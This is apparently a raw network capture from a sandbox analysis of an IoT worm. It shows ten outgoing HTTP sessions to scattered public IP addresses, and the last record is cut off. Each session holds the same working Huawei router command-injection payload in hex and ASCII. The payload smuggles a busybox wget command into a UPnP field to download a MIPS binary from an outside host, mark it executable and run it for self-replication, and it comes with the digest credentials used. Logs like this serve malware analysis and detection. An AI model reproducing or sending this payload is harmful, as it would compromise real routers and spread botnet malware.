                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  151192.168.2.1357216192.248.13.22837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663530111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  152192.168.2.1342966125.187.54.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663538933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  153192.168.2.1339894201.77.191.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663589001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  154192.168.2.1345050157.194.80.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663589001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  155192.168.2.1357766158.202.44.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663628101 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  156192.168.2.1346556197.223.147.9737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663677931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  157192.168.2.1342868197.187.28.13937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663680077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  158192.168.2.1355630197.228.184.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663681030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  159192.168.2.134427697.164.167.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663714886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  160192.168.2.135309641.161.158.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663727999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 